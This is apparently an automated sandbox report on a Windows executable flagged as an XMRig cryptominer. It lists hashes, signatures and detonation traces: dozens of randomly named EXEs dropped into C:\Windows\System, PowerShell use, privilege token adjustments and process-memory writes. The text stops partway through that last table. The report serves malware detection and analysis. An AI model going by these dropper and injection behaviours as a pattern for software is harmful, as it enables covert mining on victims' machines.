Malware Analysis Report

2024-09-10 00:10

Sample ID 240613-kbj6zs1clh
Target 6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe
SHA256 f2c5e4266f43b7690c4ec87255b387ef19c8c112511e6ed43a7b9b29f014266c
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f2c5e4266f43b7690c4ec87255b387ef19c8c112511e6ed43a7b9b29f014266c

Threat Level: Known bad

The file 6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 08:25

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 08:25

Reported

2024-06-13 08:28

Platform

win7-20240611-en

Max time kernel

148s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\bOwsIEf.exe N/A
N/A N/A C:\Windows\System\SHYViEx.exe N/A
N/A N/A C:\Windows\System\dcFSTBl.exe N/A
N/A N/A C:\Windows\System\yBwXTXG.exe N/A
N/A N/A C:\Windows\System\vvEAzgP.exe N/A
N/A N/A C:\Windows\System\cualdXX.exe N/A
N/A N/A C:\Windows\System\FnQPgSH.exe N/A
N/A N/A C:\Windows\System\vxQIyxs.exe N/A
N/A N/A C:\Windows\System\auvTuOf.exe N/A
N/A N/A C:\Windows\System\TYdzXPO.exe N/A
N/A N/A C:\Windows\System\UFirVxb.exe N/A
N/A N/A C:\Windows\System\WtpAotk.exe N/A
N/A N/A C:\Windows\System\aTnAPCk.exe N/A
N/A N/A C:\Windows\System\tRnWOOm.exe N/A
N/A N/A C:\Windows\System\QYIjkGj.exe N/A
N/A N/A C:\Windows\System\nCfqZyI.exe N/A
N/A N/A C:\Windows\System\RDlJFIB.exe N/A
N/A N/A C:\Windows\System\LneGZqL.exe N/A
N/A N/A C:\Windows\System\EZjAoTz.exe N/A
N/A N/A C:\Windows\System\TxjyDsq.exe N/A
N/A N/A C:\Windows\System\WxhdyAP.exe N/A
N/A N/A C:\Windows\System\vanvNUE.exe N/A
N/A N/A C:\Windows\System\GCSuzVw.exe N/A
N/A N/A C:\Windows\System\DatdwDJ.exe N/A
N/A N/A C:\Windows\System\QYlJInL.exe N/A
N/A N/A C:\Windows\System\ddwuOGU.exe N/A
N/A N/A C:\Windows\System\gnyMEel.exe N/A
N/A N/A C:\Windows\System\RaGfsME.exe N/A
N/A N/A C:\Windows\System\AovGbkG.exe N/A
N/A N/A C:\Windows\System\PJSqTwP.exe N/A
N/A N/A C:\Windows\System\dLmIShV.exe N/A
N/A N/A C:\Windows\System\gwvysft.exe N/A
N/A N/A C:\Windows\System\mzaWJTt.exe N/A
N/A N/A C:\Windows\System\EHknfzd.exe N/A
N/A N/A C:\Windows\System\tdBKuqZ.exe N/A
N/A N/A C:\Windows\System\crxUIVS.exe N/A
N/A N/A C:\Windows\System\eFbkRNL.exe N/A
N/A N/A C:\Windows\System\OHzonhG.exe N/A
N/A N/A C:\Windows\System\RqmLyGw.exe N/A
N/A N/A C:\Windows\System\NxmgHJi.exe N/A
N/A N/A C:\Windows\System\yfhyrZF.exe N/A
N/A N/A C:\Windows\System\trkKRpA.exe N/A
N/A N/A C:\Windows\System\eEdwrkp.exe N/A
N/A N/A C:\Windows\System\EEAbHSM.exe N/A
N/A N/A C:\Windows\System\DEINBfH.exe N/A
N/A N/A C:\Windows\System\uaNttqa.exe N/A
N/A N/A C:\Windows\System\etkXNmp.exe N/A
N/A N/A C:\Windows\System\QFOtptN.exe N/A
N/A N/A C:\Windows\System\SbcCKHR.exe N/A
N/A N/A C:\Windows\System\mvqCcWz.exe N/A
N/A N/A C:\Windows\System\tfcniGF.exe N/A
N/A N/A C:\Windows\System\oGGnVrU.exe N/A
N/A N/A C:\Windows\System\GKGXPCO.exe N/A
N/A N/A C:\Windows\System\PuNNzGo.exe N/A
N/A N/A C:\Windows\System\JIzClxr.exe N/A
N/A N/A C:\Windows\System\RusrGEM.exe N/A
N/A N/A C:\Windows\System\fLLumkD.exe N/A
N/A N/A C:\Windows\System\JyJOLwb.exe N/A
N/A N/A C:\Windows\System\joXekos.exe N/A
N/A N/A C:\Windows\System\NofkIaF.exe N/A
N/A N/A C:\Windows\System\WuuMPgy.exe N/A
N/A N/A C:\Windows\System\dZrVlsD.exe N/A
N/A N/A C:\Windows\System\FHtKTdk.exe N/A
N/A N/A C:\Windows\System\zqYetSR.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\cIwyGlP.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OKSbZqz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\miGfCVh.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\klNutes.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xSSyoGa.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YebzFIF.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qOTlqIa.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YEAuKey.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mcmPhSz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EHknfzd.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mWtysqv.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kUGhtdQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TTeDfHb.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MXPsNgA.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kHWqLIw.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pOYXkmZ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wOLONdz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MBxGTiF.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\FMbbWvk.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pHCPeZO.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CfiqtPm.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EsQXbRA.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZmvvQsg.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MOBRurl.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SVDYdcJ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sjPHetB.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dyxZkNT.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\olgIDLr.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\noaSWsa.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kDUhjOx.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iBjnmOA.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gWKgxtU.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BuFXFEs.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\etkXNmp.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lIalUjA.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KqdPIOo.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EQuvptT.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HSqwfMl.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OSNLUpE.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nCfqZyI.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NSbtSYI.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WTnDyca.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qBaUbuv.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yepAPZE.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zFrbKNt.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wqDwaOy.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qGgwsMz.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nmjlvCS.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wlkqVXs.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bvvEEUa.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rQveWCq.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lqgchzX.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PxaMimB.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZCTDpjk.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yPqkGrr.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iJFjeXD.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qyJWtJf.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\przpneM.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wERSoty.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WwgUOJV.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZAaRSUH.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ELGpNMF.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZnHnoVQ.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mpzKznd.exe C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2104 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bOwsIEf.exe
PID 2104 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bOwsIEf.exe
PID 2104 wrote to memory of 3016 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\bOwsIEf.exe
PID 2104 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SHYViEx.exe
PID 2104 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SHYViEx.exe
PID 2104 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\SHYViEx.exe
PID 2104 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\dcFSTBl.exe
